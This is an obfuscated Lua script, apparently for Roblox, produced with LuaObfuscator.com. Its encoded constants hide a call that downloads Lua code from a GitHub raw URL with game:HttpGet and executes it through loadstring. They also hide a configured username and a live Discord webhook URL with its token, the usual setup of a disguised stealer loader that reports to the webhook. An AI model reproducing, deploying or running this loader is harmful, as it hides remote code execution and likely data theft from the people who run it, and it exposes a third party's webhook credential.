--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (2==v0) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==5) then v16=nil;v16=function(v20,v21,...)local v27=1;local v28;v20=v5(v4(v20,5),"..",function(v29)if (v2(v29,2)==79) then local v83=0;while true do if (v83==0) then v28=v1(v4(v29,1,1));return "";end end else local v84=0;local v85;while true do if (0==v84) then v85=v3(v1(v29,16));if v28 then local v107=0;local v108;while true do if (v107==0) then v108=v6(v85,v28);v28=nil;v107=1;end if (v107==1) then return v108;end end else return v85;end break;end end end end);local function v30(v31,v32,v33)if v33 then local v86=(v31/((761 -(522 + 237))^(v32-(1 + 0))))%(2^(((v33-((3 + 0) -2)) -(v32-1)) + (1 -0))) ;return v86-(v86%(1 + (513 -(133 + 380)))) ;else local v87=(1281 -(55 + 1224))^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and (1766 -((593 -310) + 1482))) or (990 -(850 + 44 + 96)) ;end end local function v34()local v47=0 + 0 ;local v48;while true do if (v47==(1 -0)) then return v48;end if (v47==0) then v48=v2(v20,v27,v27);v27=v27 + 1 ;v47=1 + 0 ;end end end local function v35()local v49=(0 -0) + 0 ;local v50;local v51;while true do if (v49==(3 -2)) then return (v51 * (125 + 131)) + v50 ;end if (v49==((2974 -(1496 + 398)) -(1045 + 35))) then v50,v51=v2(v20,v27,v27 + 2 );v27=v27 + 2 ;v49=1 -0 ;end end end local function v36()local v52,v53,v54,v55=v2(v20,v27,v27 + (11 -8) );v27=v27 + ((1704 -(1130 + 555)) -15) ;return (v55 * (16777342 -(94 + 32))) + (v54 * (132042 -(174900 -108394))) + (v53 * 256) + v52 ;end local function v37()local v56=v36();local v57=v36();local v58=1;local v59=(v30(v57,393 -(295 + 97) ,20) * ((1 + 1)^(29 + 3))) + v56 ;local v60=v30(v57,8 + (485 -(314 + 158)) ,(1081 -389) -((473 -183) + 371) );local v61=((v30(v57,(109 -42) -35 )==(1817 -(1628 + 188))) and  -(1 -0)) or ((3 -2) -0) ;if (v60==(0 -0)) then if (v59==(0 -0)) then return v61 * (0 + (1568 -(262 + 1306))) ;else v60=1 + 0 ;v58=(1544 -(972 + 572)) + 0 ;end elseif (v60==(1210 + (1409 -572))) then return ((v59==0) and (v61 * (((144 -(93 + 50)) + 0)/(914 -(842 + 72))))) or (v61 * NaN) ;end return v9(v61,v60-1023 ) * (v58 + (v59/(2^(1127 -(780 + 295))))) ;end local function v38(v39)local v62;if  not v39 then v39=v36();if (v39==(497 -(60 + 437))) then return "";end end v62=v4(v20,v27,(v27 + v39) -(1 + 0) );v27=v27 + v39 ;local v63={};for v74=1613 -(440 + 1172) , #v62 do v63[v74]=v3(v2(v4(v62,v74,v74)));end return v7(v63);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v64=0 + 0 ;local v65;local v66;local v67;local v68;local v69;local v70;while true do local v76=0;while true do if (v76==1) then if ((1 + 0)==v64) then v68={v65,v66,nil,v67};v69=v36();v70={};v64=2;end if (v64==(337 -(276 + 61))) then local v98=0;while true do if (v98==1) then v67={};v64=312 -(26 + 285) ;break;end if (v98==(651 -(186 + 465))) then v65={};v66={};v98=1;end end end break;end if (v76~=0) then else if ((292 -(143 + 146))~=v64) then else local v99=0;local v100;while true do if (v99~=0) then else v100=0 + 0 ;while true do if (v100==(1867 -(1160 + 706))) then return v68;end if (v100==(0 + 0)) then for v126=1,v36() do v66[v126-(516 -(464 + 51)) ]=v42();end for v128=1,v36() do v67[v128]=v36();end v100=1 + 0 ;end end break;end end end if (v64==(2 -0)) then local v101=0 -0 ;while true do if (v101==0) then for v114=1,v69 do local v115=0 + 0 ;local v116;local v117;local v118;local v119;while true do if (v115==1) then v118=nil;v119=nil;v115=5 -3 ;end if (v115~=(0 -0)) then else v116=1185 -(731 + 454) ;v117=nil;v115=1;end if (v115==2) then while true do if (v116~=(950 -(557 + 392))) then else v119=nil;while true do if ((287 -(190 + 96))~=v117) then else if (v118==(2 -1)) then v119=v34()~=0 ;elseif (v118==(340 -(93 + 245))) then v119=v37();elseif (v118==3) then v119=v38();end v70[v114]=v119;break;end if (v117==(0 -0)) then v118=v34();v119=nil;v117=1;end end break;end if (v116==(0 + 0)) then v117=0;v118=nil;v116=1 -0 ;end end break;end end end v68[3 -0 ]=v34();v101=1;end if (v101==(1 + 0)) then for v120=702 -(356 + 345) ,v36() do local v121=0 -0 ;local v122;local v123;local v124;while true do if (v121==1) then v124=nil;while true do if (v122~=(1056 -(476 + 580))) then else local v132=714 -(46 + 668) ;while true do if (v132==(1067 -(902 + 164))) then v122=1;break;end if (v132~=0) then else v123=0;v124=nil;v132=1 + 0 ;end end end if (v122==(1 + 0)) then while true do if (v123==(176 -(104 + 72))) then v124=v34();if (v30(v124,1,1)==(0 + 0)) then local v156=283 -(55 + 228) ;local v157;local v158;local v159;while true do if (v156~=(1 + 2)) then else if (v30(v158,3,2 + 1 )~=(1 -0)) then else v159[1893 -(1248 + 641) ]=v70[v159[6 -2 ]];end v65[v120]=v159;break;end if (v156==(300 -(131 + 167))) then if (v30(v158,1,1)~=1) then else v159[2]=v70[v159[2]];end if (v30(v158,2,2)~=(1 + 0)) then else v159[3 + 0 ]=v70[v159[3 + 0 ]];end v156=3;end if (v156==(0 -0)) then v157=v30(v124,4 -2 ,7 -4 );v158=v30(v124,4,6);v156=1;end if (v156==(739 -(452 + 286))) then local v163=0 -0 ;while true do if (v163==(1692 -(757 + 935))) then v159={v35(),v35(),nil,nil};if (v157==(0 + 0)) then local v182=0;local v183;local v184;while true do if (v182==(1655 -(1152 + 502))) then while true do if (v183==(0 + 0)) then v184=0;while true do if (v184==(1962 -(1395 + 567))) then v159[6 -3 ]=v35();v159[4]=v35();break;end end break;end end break;end if ((0 + 0)~=v182) then else v183=0;v184=nil;v182=1;end end elseif (v157==1) then v159[3]=v36();elseif (v157==(1978 -(403 + 1573))) then v159[3]=v36() -((2 + 0)^(1472 -(371 + 1085))) ;elseif (v157==3) then local v191=0;local v192;while true do if (v191~=0) then else v192=0;while true do if (v192~=(0 -0)) then else v159[3]=v36() -((3 -1)^16) ;v159[15 -11 ]=v35();break;end end break;end end end v163=2 -1 ;end if (v163==(2 -1)) then v156=9 -7 ;break;end end end end end break;end end break;end end break;end if (v121~=(0 -0)) then else v122=396 -(305 + 91) ;v123=nil;v121=1;end end end v64=3;break;end end end v76=1094 -(447 + 646) ;end end end end local function v43(v44,v45,v46)local v71=v44[1];local v72=v44[2];local v73=v44[3];return function(...)local v77=0;local v78;local v79;local v80;local v81;local v82;while true do if (3==v77) then A,B=v41(v12(v82));if  not A[1] then local v102=0;local v103;while true do if (v102==0) then v103=v44[4][v78] or "?" ;error("Script error at ["   .. v103   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end break;end if (v77==2) then v82=nil;v82=function()local v88=v71;local v89=v72;local v90=v73;local v91=v41;local v92={};local v93={};local v94={};for v104=0 + 0 ,v81 do if ((v104>=v90) or ((1819 -(1067 + 563))>=(4244 -(454 + 563)))) then v92[v104-v90 ]=v80[v104 + (1 -0) ];else v94[v104]=v80[v104 + 1 ];end end local v95=(v81-v90) + 1 + 0 ;local v96;local v97;while true do local v105=(1289 -(37 + 1252)) -0 ;local v106;while true do if ((v105==(0 -(0 -0))) or (4932>(5714 -(94 + 370 + 280)))) then v106=0;while true do if ((v106==(1 + (1451 -(697 + 754)))) or ((1779 -(317 + 179))==(12358 -9241))) then if ((((2396 -(199 + 412)) + 2461)==((8224 -4402) + 424)) and (v97<=4)) then if (((11072 -8124)<(5224 -((1219 -(735 + 168)) + 775))) and (v97<=(2 -1))) then if ((v97>(0 -0)) or ((5975 -4190)>=(4841 -(375 + 1055 + 245)))) then v46[v96[3]]=v94[v96[1 + 1 ]];else do return;end end elseif ((v97<=(51 -(18 + 31))) or ((1103 + 3357)<=340)) then if ((v96[2 + 0 ]==v94[v96[1838 -((3150 -(1123 + 298)) + 105) ]]) or (3802<=324)) then v78=v78 + (1 -(0 -0)) ;else v78=v96[2 + 1 ];end elseif ((v97==(1 + 2)) or ((2632 -((1502 -(435 + 241)) + 679))==(400 + 237))) then v94[v96[3 -1 ]]=v96[14 -(991 -(327 + 653)) ];else local v148=0;local v149;local v150;local v151;local v152;while true do if (((2476 -(294 + 698))<(3044 -(99 + 333))) and (v148==(0 + 0))) then local v161=0 + 0 ;while true do if (((2787 -(471 + 282))<(8062 -3676)) and (v161==(1 + 0 + 0))) then v148=692 -(519 + 172) ;break;end if (((2564 -1596)<(4775 -(544 + 76))) and (v161==((0 -0) -0))) then v149=v96[3 -1 ];v150,v151=v91(v94[v149](v14(v94,v149 + (3 -2) ,v96[1025 -(453 + 562 + 7) ])));v161=1581 -(951 + 629) ;end end end if ((v148==(2 -1)) or ((3572 + 1163)<(131 + 116))) then v79=(v151 + v149) -(1 + 0) ;v152=0;v148=966 -(954 + (28 -18)) ;end if ((4857>=((929 -(290 + 316)) + 319)) and (v148==(212 -(106 + 104)))) then for v164=v149,v79 do local v165=0 + 0 ;local v166;while true do if ((v165==((1617 -(470 + 1147)) + 0)) or ((5817 -(392 + (1585 -1039)))<1173)) then v166=0;while true do if ((v166==(0 -0)) or ((798 -(224 + 71))<484)) then v152=v152 + 1 + 0 ;v94[v164]=v150[v152];break;end end break;end end end break;end end end elseif (((8 + 1764)<=(5833 -(435 + 1062))) and (v97<=(1999 -(6 + 1986)))) then if ((v97<=(2 + 3)) or (1112>((113 + 4726) -1542))) then local v135=(0 -0) + 0 ;local v136;local v137;local v138;while true do if (((1229 -((756 -(8 + 40)) + 520))==v135) or ((2071 -(634 + 873))==3461)) then v138=nil;while true do if ((v136==(1440 -(1016 + 423))) or ((4825 -(82 + 110))<=(1885 -(93 + 188)))) then while true do if (((1419 -(315 + 451))<=(3483 -2164)) and (v137==(0 -0))) then v138=v96[7 -5 ];v94[v138]=v94[v138](v14(v94,v138 + 1 ,v79));break;end end break;end if (((1161 -(765 + 396))==v136) or ((387 + 200)>(859 + 136))) then v137=469 -(188 + 281) ;v138=nil;v136=1 + 0 ;end end break;end if (((3121 -(338 + 1128))<=(7679 -3652)) and (v135==(1267 -(996 + 271)))) then v136=0 + 0 ;v137=nil;v135=1;end end elseif ((v97>(567 -(219 + 342))) or (2020<(860 -(109 + (1922 -1484))))) then v94[v96[985 -(733 + 250) ]]();elseif ((v94[v96[3 -1 ]]==v96[4]) or ((4298 -(718 + 617))==(11005 -7119))) then v78=v78 + 1 ;else v78=v96[3 + 0 ];end elseif ((v97<=(10 -2)) or ((2846 + 227)>=4719)) then local v139=0 -0 ;local v140;local v141;local v142;local v143;while true do if ((v139==((6239 -4307) -(1755 + 177))) or ((1845 -1006)>(870 + 350))) then v140=0 + 0 ;v141=nil;v139=1;end if ((v139==(1 + 0 + 0)) or ((5357 -(567 + 1285))<2854)) then v142=nil;v143=nil;v139=1390 -(897 + 491) ;end if (((673 + 1076)==(614 + 1135)) and (v139==(1 + 1))) then while true do if ((483<(2781 -(86 + 446))) and ((3 -2)==v140)) then v143=nil;while true do if (((4021 -(43 + 53))>=(1593 + 1103)) and (v141==(0 -0))) then local v177=0 -0 ;local v178;while true do if (((2424 + 1250)>=(2831 -(31 + 1651))) and (((863 -686) -(68 + 109))==v177)) then v178=0 -0 ;while true do if (((3498 -1521)<(6436 -(22 + 1873))) and (((903 + 411) -((670 -157) + 801))==v178)) then v142=v96[2];v143=v94[v96[1544 -(33 + 1508) ]];v178=1145 -(1100 + 44) ;end if ((v178==(301 -((583 -287) + 4))) or ((395 + 78)>=(9303 -6242))) then v141=1 + 0 ;break;end end break;end end end if ((v141==(102 -((1102 -(415 + 619)) + 33))) or ((11295 -7032)==(603 + 1043))) then v94[v142 + 1 ]=v143;v94[v142]=v143[v96[4]];break;end end break;end if (((1418 -(421 + 233))<=(4242 -(126 + 1184))) and (v140==(852 -(820 + 32)))) then local v167=0;while true do if ((1035==1035) and (v167==(0 -0))) then v141=0 + 0 ;v142=nil;v167=1;end if ((1547<=(4732 -(111 + 1418))) and ((1 + 0)==v167)) then v140=1;break;end end end end break;end end elseif (((1316 -601)==(434 + 281)) and (v97==9)) then v94[v96[(5782 -4077) -(1051 + 652) ]]=v46[v96[3 + 0 ]];else v78=v96[496 -(488 + 5) ];end v78=v78 + 1 ;break;end if (((3430 -(1226 + 668))<1871) and (v106==((0 + 0) -0))) then local v125=1247 -(366 + 881) ;while true do if ((v125==(0 -(0 -0))) or ((2820 -(1557 + 43))==35)) then v96=v88[v78];v97=v96[1794 -(1589 + (292 -(71 + 17))) ];v125=807 -(103 + 703) ;end if (((1 + 0)==v125) or ((149 + 4 + 300)==(2695 + 836))) then v106=(1938 -(816 + 1121)) + 0 ;break;end end end end break;end end end end;v77=3;end if (1==v77) then v80={...};v81=v13("#",...) -1 ;v77=2;end if (0==v77) then v78=1;v79= -1;v77=1;end end end;end return v43(v42(),{},v21)(...);end;v16("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F4D61696E2E6C756103083O00557365724E616D6503123O00626F2O736D616E314O3933363438373203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039313631352O323734352O3338323731382F684943486C7034374E5639325954314B4741576C67546D69786A7541587762664943372D6553513952346F4F7943706F2D317A382D566F42327267557867312O45586D3400143O0012033O00013O0026063O000B0001000200040A3O000B0001001209000100033O001209000200043O002008000200020005001203000400064O0004000200044O000500013O00022O000700010001000100040A3O00130001000E020001000100013O00040A3O00010001001203000100083O001201000100073O0012030001000A3O001201000100093O0012033O00023O00040A3O000100016O00017O00143O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v10(),...);break;end if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (1==v0) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end end end
